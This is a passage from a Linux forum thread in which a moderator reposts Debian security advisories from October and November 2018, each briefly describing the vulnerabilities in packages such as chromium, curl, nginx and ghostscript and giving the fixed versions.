handling of case-sensitivity in an internal API function which could
affect some code built against the GraphicsMagick libraries. This update
restores the previous behaviour.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.30+hg15796-1~deb9u2.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4329-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 28, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : teeworlds
CVE ID         : CVE-2018-18541

It was discovered that incorrect connection setup in the server for
Teeworlds, an online multi-player platform 2D shooter, could result in
denial of service via forged connection packets (rendering all game
server slots occupied).

For the stable distribution (stretch), this problem has been fixed in
version 0.6.5+dfsg-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1493 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 02 November 2018 - 07:30 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4330-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
November 02, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2018-5179 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464
                 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468
                 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473
                 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-17477

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2018-5179

    Yannic Boneberger discovered an error in the ServiceWorker implementation.

CVE-2018-17462

    Ned Williamson and Niklas Baumstark discovered a way to escape the sandbox.

CVE-2018-17463

    Ned Williamson and Niklas Baumstark discovered a remote code execution
    issue in the v8 javascript library.

CVE-2018-17464

    xisigr discovered a URL spoofing issue.

CVE-2018-17465

    Lin Zuojian discovered a use-after-free issue in the v8 javascript
    library.

CVE-2018-17466

    Omair discovered a memory corruption issue in the angle library.

CVE-2018-17467

    Khalil Zhani discovered a URL spoofing issue.

CVE-2018-17468

    Jams Lee discovered an information disclosure issue.

CVE-2018-17469

    Zhen Zhou discovered a buffer overflow issue in the pdfium library.

CVE-2018-17470

    Zhe Jin discovered a memory corruption issue in the GPU backend
    implementation.

CVE-2018-17471

    Lnyas Zhang discovered an issue with the full screen user interface.

CVE-2018-17473

    Khalil Zhani discovered a URL spoofing issue.

CVE-2018-17474

    Zhe Jin discovered a use-after-free issue.

CVE-2018-17475

    Vladimir Metnew discovered a URL spoofing issue.

CVE-2018-17476

    Khalil Zhani discovered an issue with the full screen user interface.

CVE-2018-17477

    Aaron Muir Hamilton discovered a user interface spoofing issue in the
    extensions pane.

This update also fixes a buffer overflow in the embedded lcms library included
with chromium.

For the stable distribution (stretch), these problems have been fixed in
version 70.0.3538.67-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4331-1                   security@debian.org
https://www.debian.org/security/                       Alessandro Ghedini
November 02, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : curl
CVE ID         : CVE-2018-16839 CVE-2018-16842

Two vulnerabilities were discovered in cURL, an URL transfer library.

CVE-2018-16839

    Harry Sintonen discovered that, on systems with a 32 bit size_t, an
    integer overflow would be triggered when a SASL user name longer
    than 2GB is used. This would in turn cause a very small buffer to be
    allocated instead of the intended very huge one, which would trigger
    a heap buffer overflow when the buffer is used.

CVE-2018-16842

    Brian Carpenter discovered that the logic in the curl tool to wrap
    error messages at 80 columns is flawed, leading to a read buffer
    overflow if a single word in the message is itself longer than 80
    bytes.

For the stable distribution (stretch), these problems have been fixed in
version 7.52.1-5+deb9u8.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1494 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 03 November 2018 - 07:10 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4332-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 03, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ruby2.3
CVE ID         : CVE-2018-16395 CVE-2018-16396

Several vulnerabilities have been discovered in the interpreter for the
Ruby language. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2018-16395

    Tyler Eckstein reported that the equality check of
    OpenSSL::X509::Name could return true for non-equal objects. If a
    malicious X.509 certificate is passed to compare with an existing
    certificate, there is a possibility to be judged incorrectly that
    they are equal.

CVE-2018-16396

    Chris Seaton discovered that tainted flags are not propagated in
    Array#pack and String#unpack with some directives.

For the stable distribution (stretch), these problems have been fixed in
version 2.3.3-1+deb9u4.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1495 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 04 November 2018 - 06:51 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4333-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 04, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : icecast2
CVE ID         : CVE-2018-18820

Nick Rolfe discovered multiple buffer overflows in the Icecast multimedia
streaming server which could result in the execution of arbitrary code.

For the stable distribution (stretch), this problem has been fixed in
version 2.4.2-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4334-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 04, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-17866 CVE-2018-5686 CVE-2018-6187 CVE-2018-6192
                 CVE-2018-1000037 CVE-2018-1000040

Multiple vulnerabilities were discovered in MuPDF, a PDF, XPS, and e-book
viewer which could result in denial of service or the execution of
arbitrary code if malformed documents are opened.

For the stable distribution (stretch), these problems have been fixed in
version 1.9a+ds1-4+deb9u4.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1496 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 08 November 2018 - 06:48 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4335-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : nginx
CVE ID         : CVE-2018-16843 CVE-2018-16844 CVE-2018-16845

Three vulnerabilities were discovered in Nginx, a high-performance web
and reverse proxy server, which could in denial of service in processing
HTTP/2 (via excessive memory/CPU usage) or server memory disclosure in
the ngx_http_mp4_module module (used for server-side MP4 streaming).

For the stable distribution (stretch), these problems have been fixed in
version 1.10.3-1+deb9u2.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1497 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 12 November 2018 - 12:15 AM

------------------------------------------------------------------------
The Debian Project                               https://www.debian.org/
Updated Debian 9: 9.6 released                          press@debian.org
November 10th, 2018            https://www.debian.o...s/2018/20181110
------------------------------------------------------------------------


The Debian project is pleased to announce the sixth update of its stable
distribution Debian 9 (codename "stretch"). This point release mainly
adds corrections for security issues, along with a few adjustments for
serious problems. Security advisories have already been published
separately and are referenced where available.

Please note that the point release does not constitute a new version of
Debian 9 but only updates some of the packages included. There is no
need to throw away old "stretch" media. After installation, packages can
be upgraded to the current versions using an up-to-date Debian mirror.

Those who frequently install updates from security.debian.org won't have
to update many packages, and most such updates are included in the point
release.

New installation images will be available soon at the regular locations.

Upgrading an existing installation to this revision can be achieved by
pointing the package management system at one of Debian's many HTTP
mirrors. A comprehensive list of mirrors is available at:

https://www.debian.org/mirror/list

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4336-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 10, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ghostscript
CVE ID         : CVE-2018-11645 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284
Debian Bug     : 910678 910758 911175

Several vulnerabilities were discovered in Ghostscript, the GPL
PostScript/PDF interpreter, which may result in denial of service,
disclosure of existence and size of arbitrary files, or the execution of
arbitrary code if a malformed Postscript file is processed (despite the
dSAFER sandbox being enabled).

This update rebases ghostscript for stretch to the upstream version 9.25
which includes additional non-security related changes.

For the stable distribution (stretch), these problems have been fixed in
version 9.25~dfsg-0+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4337-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 10, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392
                 CVE-2018-12393

Multiple security issues have been found in Thunderbird: Multiple memory
safety errors may lead to the execution of arbitrary code or denial of
service.

For the stable distribution (stretch), these problems have been fixed in
version 1:60.3.0-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4338-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 11, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : qemu
CVE ID         : CVE-2018-10839 CVE-2018-17962 CVE-2018-17963
Debian Bug     : 908682 910431 911468 911469

Integer overflows in the processing of packets in network cards emulated
by QEMU, a fast processor emulator, could result in denial of service.

In addition this update backports support to passthrough the new CPU
features added in the intel-microcode update shipped in DSA 4273 to
x86-based guests.

For the stable distribution (stretch), these problems have been fixed in
version 1:2.8+dfsg-6+deb9u5.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1498 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted 13 November 2018 - 07:13 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4339-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 13, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ceph
CVE ID         : CVE-2017-7519 CVE-2018-1086 CVE-2018-1128 CVE-2018-1129

Multiple vulnerabilities were discovered in Ceph, a distributed storage
and file system: The cephx authentication protocol was suspectible to
replay attacks and calculated signatures incorrectly, "ceph mon" did not
validate capabilities for pool operations (resulting in potential
corruption or deletion of snapshot images) and a format string
vulnerability in libradosstriper could result in denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 10.2.11-1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#1499 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,696 posts

Posted Yesterday, 06:40 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4340-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
November 18, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2018-17478

An out-of-bounds bounds memory access issue was discovered in chromium's
v8 javascript library by cloudfuzzer.

This update also fixes two problems introduced by the previous security
upload.  Support for arm64 has been restored and gconf-service is no longer
a package dependency.

For the stable distribution (stretch), this problem has been fixed in
version 70.0.3538.102-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.





Also tagged with one or more of these keywords: debian, updates, sunrat, bruno, v.t. eric layton

1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users